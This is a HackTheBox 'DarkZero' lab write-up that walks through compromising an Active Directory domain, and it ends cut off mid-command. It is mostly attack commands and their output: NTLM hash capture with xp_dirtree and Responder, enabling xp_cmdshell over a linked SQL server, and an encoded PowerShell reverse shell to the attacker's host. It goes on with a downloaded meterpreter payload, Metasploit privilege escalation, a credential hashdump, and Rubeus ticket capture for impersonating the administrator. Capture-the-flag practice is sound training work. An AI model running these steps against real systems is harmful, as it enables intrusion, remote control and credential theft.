WriteupsHTB — DarkZero
ADMediumWindows
HTB — DarkZero
Active Directory environment with Shadow Credentials and Resource-Based Constrained Delegation abuse to achieve full domain compromise.
October 6, 2025HackTheBox
#AD#Shadow Credentials#RBCD#Delegation
nmap
sh
nmap -sC -sV -p- -Pn 10.10.11.89 -oN nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-06 09:55 EDT
Nmap scan report for 10.10.11.89
Host is up (0.026s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-06 20:57:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RC0+
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-05T01:58:37
|_Not valid after: 2055-10-05T01:58:37
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2025-10-06T20:58:56+00:00; +7h00m01s from scanner time.
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49907/tcp open msrpc Microsoft Windows RPC
49920/tcp open msrpc Microsoft Windows RPC
49934/tcp open msrpc Microsoft Windows RPC
49970/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-10-06T20:58:17
|_ start_date: N/A
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 207.12 secondscreds
sh
As is common in real life pentests, you will start the DarkZero box with credentials for the following account john.w / RFulUtONCOL!sh
╭─root@parrot /home/sake/htb/seasonal/DarkZero
╰─# nxc mssql DC01 -u john.w -p 'RFulUtONCOL!'
MSSQL 10.10.11.89 1433 DC01 [*] 10.0 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.10.11.89 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
╭─root@parrot /home/sake/htb/seasonal/DarkZero
╰─# nxc smb DC01 -u john.w -p 'RFulUtONCOL!'
SMB 10.10.11.89 445 DC01 [*] Windows 10.0 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.89 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL! shares
sh
nxc smb DC01 -u john.w -p 'RFulUtONCOL!' --shares
SMB 10.10.11.89 445 DC01 [*] Windows 10.0 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.89 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
SMB 10.10.11.89 445 DC01 [*] Enumerated shares
SMB 10.10.11.89 445 DC01 Share Permissions Remark
SMB 10.10.11.89 445 DC01 ----- ----------- ------
SMB 10.10.11.89 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.89 445 DC01 C$ Default share
SMB 10.10.11.89 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.89 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.89 445 DC01 SYSVOL READ Logon server share bloodhound
sh
sudo bloodhound-python -u 'john.w' -p 'RFulUtONCOL!' -ns 10.10.11.89 -d darkzero.htb -c allsh
zip -r darkzero_bh.zip *.jsonsh
nxc ldap 10.10.11.89 -u john.w -p 'RFulUtONCOL!' --bloodhound -c All --dns-server 10.10.11.89
SMB 10.10.11.89 445 DC01 [*] Windows 10.0 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.11.89 636 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
LDAPS 10.10.11.89 636 DC01 Resolved collection methods: container, dcom, localadmin, group, acl, objectprops, trusts, rdp, psremote, session
LDAP 10.10.11.89 389 DC01 Done in 00M 05S
LDAPS 10.10.11.89 636 DC01 Compressing output into /root/.nxc/logs/DC01_10.10.11.89_2025-10-06_105558_bloodhound.zipmssql
sh
impacket-mssqlclient john.w@dc01.darkzero.htb -windows-auth 130 ↵
Impacket v0.11.0 - Copyright 2023 Fortra
Password: RFulUtONCOL!
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (darkzero\john.w guest@master)> sh
SQL (darkzero\john.w guest@master)> enable_xp_cmdshell
[-] ERROR(DC01): Line 105: User does not have permission to perform this action.
[-] ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(DC01): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.XP_SUBDIRS Hash Stealing
sh
SQL (darkzero\john.w guest@master)> EXEC master..xp_dirtree '\\10.10.14.4\share\'XP_SUBDIRS Hash Stealing with Responder
shell
sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.4]
Responder IPv6 [dead:beef:2::1002]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-LRFS6Q5GWCB]
Responder Domain Name [88UE.LOCAL]
Responder DCE-RPC Port [45901]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.89
[SMB] NTLMv2-SSP Username : darkzero\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::darkzero:378d4a3875e72d8a:500522817B066A55B611AF3FB642D438:01010000000000008092C46FE036DC01B9366EF960D5197C0000000002000800380038005500450001001E00570049004E002D004C00520046005300360051003500470057004300420004003400570049004E002D004C0052004600530036005100350047005700430042002E0038003800550045002E004C004F00430041004C000300140038003800550045002E004C004F00430041004C000500140038003800550045002E004C004F00430041004C00070008008092C46FE036DC0106000400020000000800300030000000000000000000000000300000B83C1E38A160DD09EEC53CE423E7C88CBC1DE3CD9165575D815048B1DED166030A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0034000000000000000000
- cant crack
sh
hashcat -m 5600 dc01_ntlmv2.txt /usr/share/wordlists/rockyou.txt- cant impersonate
sh
SQL (darkzero\john.w guest@master)> EXEC master..xp_dirtree '\\10.10.14.4\share\'
subdirectory depth
------------ -----
SQL (darkzero\john.w guest@master)> SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
name
---- enumerating links
sh
impacket-mssqlclient john.w@dc01.darkzero.htb -windows-auth 148 ↵
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (darkzero\john.w guest@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
----------------- ---------------- ----------- ----------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
DC02.darkzero.ext SQLNCLI SQL Server DC02.darkzero.ext NULL NULL NULL
Linked Server Local Login Is Self Mapping Remote Login
----------------- --------------- --------------- ------------
DC02.darkzero.ext darkzero\john.w 0 dc01_sql_svcsh
SQL (darkzero\john.w guest@master)> use_link "DC02.darkzero.ext"sh
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> enum_logins
name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin
--------------------------------- ------------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- ---------
sa SQL_LOGIN 1 1 0 0 0 0 0 0 0
##MS_PolicyEventProcessingLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0
##MS_PolicyTsqlExecutionLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0
darkzero-ext\Domain Admins WINDOWS_GROUP 0 1 0 0 0 0 0 0 0
NT SERVICE\SQLWriter WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\Winmgmt WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT Service\MSSQLSERVER WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT AUTHORITY\SYSTEM WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
NT SERVICE\SQLSERVERAGENT WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\SQLTELEMETRY WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
dc01_sql_svc SQL_LOGIN 0 1 0 0 0 0 0 0 0 - we are part of the sysadmin
sh
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> SELECT is_srvrolemember('sysadmin')
-
1 sh
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> EXEC xp_cmdshell 'whoami'
[-] ERROR(DC02): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.enabling xp_cmdshell
sh
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> EXECUTE sp_configure 'show advanced options', 1
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> RECONFIGURE
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> EXECUTE sp_configure 'xp_cmdshell', 1
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> RECONFIGURE
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> xp_cmdshell "whoami"
output
--------------------
darkzero-ext\svc_sql
NULL reverse shell
sh
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> xp_cmdshell "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANAAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"sh
rlwrap nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.89 56870
whoami
darkzero-ext\svc_sqlmeterpreter rev shell
sh
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=445 -f exe > rev_meter.exesh
PS C:\users\svc_sql\Documents> Invoke-WebRequest http://10.10.14.4/rev_meter.exe -OutFile rev_meter.exesh
[msf](Jobs:0 Agents:0) >> use exploit/multi/handler
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set payload windows/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set lhost 10.10.14.4
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set lport 443sh
PS C:\users\svc_sql\Documents> .\rev_meter.exeexploit suggester
sh
[msf](Jobs:0 Agents:1) exploit(multi/handler) >> use multi/recon/local_exploit_suggester
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> set session 1
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> run
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_sdclt Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2022_21882_win32k Yes The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2022
4 exploit/windows/local/cve_2022_21999_spoolfool_privesc Yes The target appears to be vulnerable.
5 exploit/windows/local/cve_2023_28252_clfs_driver Yes The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
6 exploit/windows/local/cve_2024_30085_cloud_files Yes The target appears to be vulnerable.
7 exploit/windows/local/cve_2024_30088_authz_basep Yes The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
8 exploit/windows/local/cve_2024_35250_ks_driver Yes The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
9 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.cve_2024_30088_authz_basep
sh
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> use exploit/windows/local/cve_2024_30088_authz_basep
[msf](Jobs:0 Agents:1) exploit(windows/local/cve_2024_30088_authz_basep) >> set session 1
[msf](Jobs:0 Agents:1) exploit(windows/local/cve_2024_30088_authz_basep) >> set lhost 10.10.14.4
[msf](Jobs:0 Agents:1) exploit(windows/local/cve_2024_30088_authz_basep) >> set lport 446sh
(Meterpreter 2)(C:\Windows\system32) > getuid
Server username: NT AUTHORITY\SYSTEMhashdump
sh
(Meterpreter 2)(C:\Windows\system32) > hashdump
Administrator:500:aad3b435...:6963aad8...:::
Guest:501:aad3b435...:31d6cfe0...:::
krbtgt:502:aad3b435...:43e27ea2...:::
svc_sql:1103:aad3b435...:816ccb84...:::
DC02$:1000:aad3b435...:663a13eb...:::
darkzero$:1105:aad3b435...:4276fdf2...:::user.txt
sh
C:\Users\Administrator\Desktop>type user.txt
type user.txt
85543c82...sh
C:\Users\Administrator\Desktop>hostname
hostname
DC02sh
PS C:\Users\Administrator\Documents> Invoke-WebRequest http://10.10.14.4/PowerView.ps1 -OutFile PowerView.ps1
PS C:\Users\Administrator\Documents> Import-Module .\PowerView.ps1sh
PS C:\Users\Administrator\Documents> Get-ForestDomain
Get-ForestDomain
Forest : darkzero.ext
DomainControllers : {DC02.darkzero.ext}
Children : {}
DomainMode : Unknown
DomainModeLevel : 7
Parent :
PdcRoleOwner : DC02.darkzero.ext
RidRoleOwner : DC02.darkzero.ext
InfrastructureRoleOwner : DC02.darkzero.ext
Name : darkzero.extsh
PS C:\Users\Administrator\Documents> Get-DomainTrust
Get-DomainTrust
SourceName : darkzero.ext
TargetName : darkzero.htb
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection : Bidirectional
WhenCreated : 7/29/2025 3:30:19 PM
WhenChanged : 9/29/2025 6:25:18 PMadsearch
sh
Invoke-WebRequest http://10.10.14.4/ADSearch.exe -OutFile ADSearch.exesh
PS C:\Users\Administrator\Documents> .\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
.\\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
___ ____ _____ __
/ | / __ \/ ___/___ ____ ______/ /_
/ /| | / / / /\__ \/ _ \/ __ `/ ___/ __ \
/ ___ |/ /_/ /___/ / __/ /_/ / /__/ / / /
/_/ |_/_____//____/\___/\__,_/\___/_/ /_/
Twitter: @tomcarver_
GitHub: @tomcarver16
[*] No domain supplied. This PC's domain will be used instead
[*] LDAP://DC=darkzero,DC=ext
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 1
[+] samaccountname : DC02$
[+] dnshostname : DC02.darkzero.extrubeus
sh
Invoke-WebRequest http://10.10.14.4/Rubeus.exe -OutFile Rubeus.exesh
PS C:\Users\Administrator\Documents> .\Rubeus.exe monitor /interval:10 /nowrap sh
impacket-mssqlclient john.w@dc01.darkzero.htb -windows-auth
Impacket v0.11.0 - Copyright 2023 Fortra
Password: RFulUtONCOL!
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands sh
SQL (darkzero\john.w guest@master)> EXEC master..xp_dirtree '\\DC02.darkzero.ext\share\'
subdirectory depth
------------ ----- sh
[*] 10/7/2025 11:15:23 AM UTC - Found new TGT:
User : DC01$@DARKZERO.HTB
StartTime : 10/7/2025 4:15:17 AM
EndTime : 10/7/2025 2:15:17 PM
RenewTill : 10/14/2025 4:15:17 AM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDY3QKoNcknXuijGJycr4+zRGRMwxzdD+OZMJqwUHCpwXm8BCpyoSaWkFMIqyNQS9umWG28lTreDsY1tMz/XCFeu71fpc0jz/Qc9iQ1AAGFjrDsqFPTSnthWMUG8x9C90pyDtaIoZ4hxibYrq6ZWF70DzPG4+j2XTI+Mgf0zehh4FwnvMrVawDUko92wfPd+eJmLgCl6wWSN3ASr5J8W/uhLbnqcqRJb/GT/IimECYFebcGkrWs8Rj37AU5JxpYFnXRntGxUyl7mdLUaRm4CICZSxU2dzyTedv+ckzZheaGQRxDPMCPYBrkJ+JrBKTR3E7d7FD/ys/VSP3J/sZGQO0qXjydyLmQiJ6xUI+rGWeJyp+wHX46/W56GL/TUcSUwHE7wg/aFLINkweyhwyIh7KpnhB3FT4O6VNEZBnc/5NlAwIuQG/ql510z0YUP3Hvl0a7ZzxruNE3KU2s1epx+wUe6MK3Y8AzstZYayf8xY+/YaRyKCkbv/fONsNgfensYp7MWosXnJy6Q9X8Kg/oDQ2AcCoiT5xWE9JqWDL6G2wPDm6T6AfZJrLIOksNjOWJbOOComESyAYdxvGfGlBrvtiDvq7K+Zit6ICFbzIkoVFsJv53tYgpui0V+XUyJ68MBlqXKUSxFNHuouMtOHXWKGZH/xa0DD7rtWKBuWYXcF9imvVMFqiNOnjNk5z3kioj9wGmCjUSETkoWxKvHpbEuODcHOmJyofQbmQtXXTx103M/NBspy0GhRfMAOPdyGZN34qdKWpcVnyQ+RdgIhMRRHHEWg/5sZvx2/5b5GNztde798N9qXWC78j4l/ZqAKR5I06l7N3m7GrHGgZCuHgqHWWI5aRj6qZxw4svHffYsgoGDyXVO9Z7o1Eo1jgGbp7iK8vH/ehGhWsQQjxVZxcoiC+RmWUQ3GkAjCxGb927x3pShnMVrQwyssDm65ietS5KNScVb9Jl/kILvYZB8/yVd4q/m0H6dk8kC5emKDqi7xM6Nl0O5Jbnzv03ncfd2qRjHBxdCPLR0wWse7/KuFvSolQtAI2Ok/mgkkZ5WRp46HX4ZooorXozmNEuWbb5mHxeITcxYmPCE0ZnXoCnOXK8jwdr/X4Zc5+cCRR0a4WI+lvbmOsFdU6DKbXajIRTiowkNqN5z92R6DCedI62AaxCo5wEBG1RkyAGSmwdwH8ML+RVMbF7AAxqPrzAvrS4voUd6Rz4BUTH6vI7VF8VE+CbN5AnItrd+cUFjgUe+IWsTqIuCGPgrEgj1qH3LxC/lcLEFuzI0Tg9sfvGuE5sDCnfPQqQEZbxjm7Q7Qsl+qK4TDf84uqG0W4RCBO4Bd70sU2gcaL3x32JiSXTCPyF+LDi3WMH3tIZrpxr6HaE4n1cc4Pmigl5RaFmv+qwe49w8SLZ0j7kU4Nhfxai+CCHtDxX3ojwzLXRZl4Oro4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQgg09bOk1z92GA4znD49Q9IwswrmDpCYsnYNf3HOplaU2hDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDcxMTE1MTdaphEYDzIwMjUxMDA3MjExNTE3WqcRGA8yMDI1MTAxNDExMTUxN1qoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=
[*] Ticket cache size: 7sh
.\Rubeus.exe s4u /impersonateuser:administrator /msdsspn:cifs/dc01.darkzero.htb /user:DC01$ /ticket:doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDY3QKoNcknXuijGJycr4+zRGRMwxzdD+OZMJqwUHCpwXm8BCpyoSaWkFMIqyNQS9umWG28lTreDsY1tMz/XCFeu71fpc0jz/Qc9iQ1AAGFjrDsqFPTSnthWMUG8x9C90pyDtaIoZ4hxibYrq6ZWF70DzPG4+j2XTI+Mgf0zehh4FwnvMrVawDUko92wfPd+eJmLgCl6wWSN3ASr5J8W/uhLbnqcqRJb/GT/IimECYFebcGkrWs8Rj37AU5JxpYFnXRntGxUyl7mdLUaRm4CICZSxU2dzyTedv+ckzZheaGQRxDPMCPYBrkJ+JrBKTR3E7d7FD/ys/VSP3J/sZGQO0qXjydyLmQiJ6xUI+rGWeJyp+wHX46/W56GL/TUcSUwHE7wg/aFLINkweyhwyIh7KpnhB3FT4O6VNEZBnc/5NlAwIuQG/ql510z0YUP3Hvl0a7ZzxruNE3KU2s1epx+wUe6MK3Y8AzstZYayf8xY+/YaRyKCkbv/fONsNgfensYp7MWosXnJy6Q9X8Kg/oDQ2AcCoiT5xWE9JqWDL6G2wPDm6T6AfZJrLIOksNjOWJbOOComESyAYdxvGfGlBrvtiDvq7K+Zit6ICFbzIkoVFsJv53tYgpui0V+XUyJ68MBlqXKUSxFNHuouMtOHXWKGZH/xa0DD7rtWKBuWYXcF9imvVMFqiNOnjNk5z3kioj9wGmCjUSETkoWxKvHpbEuODcHOmJyofQbmQtXXTx103M/NBspy0GhRfMAOPdyGZN34qdKWpcVnyQ+RdgIhMRRHHEWg/5sZvx2/5b5GNztde798N9qXWC78j4l/ZqAKR5I06l7N3m7GrHGgZCuHgqHWWI5aRj6qZxw4svHffYsgoGDyXVO9Z7o1Eo1jgGbp7iK8vH/ehGhWsQQjxVZxcoiC+RmWUQ3GkAjCxGb927x3pShnMVrQwyssDm65ietS5KNScVb9Jl/kILvYZB8/yVd4q/m0H6dk8kC5emKDqi7xM6Nl0O5Jbnzv03ncfd2qRjHBxdCPLR0wWse7/KuFvSolQtAI2Ok/mgkkZ5WRp46HX4ZooorXozmNEuWbb5mHxeITcxYmPCE0ZnXoCnOXK8jwdr/X4Zc5+cCRR0a4WI+lvbmOsFdU6DKbXajIRTiowkNqN5z92R6DCedI62AaxCo5wEBG1RkyAGSmwdwH8ML+RVMbF7AAxqPrzAvrS4voUd6Rz4BUTH6vI7VF8VE+CbN5AnItrd+cUFjgUe+IWsTqIuCGPgrEgj1qH3LxC/lcLEFuzI0Tg9sfvGuE5sDCnfPQqQEZbxjm7Q7Qsl+qK4TDf84uqG0W4RCBO4Bd70sU2gcaL3x32JiSXTCPyF+LDi3WMH3tIZrpxr6HaE4n1cc4Pmigl5RaFmv+qwe49w8SLZ0j7kU4Nhfxai+CCHtDxX3ojwzLXRZl4Oro4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQgg09bOk1z92GA4znD49Q9IwswrmDpCYsnYNf3HOplaU2hDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDcxMTE1MTdaphEY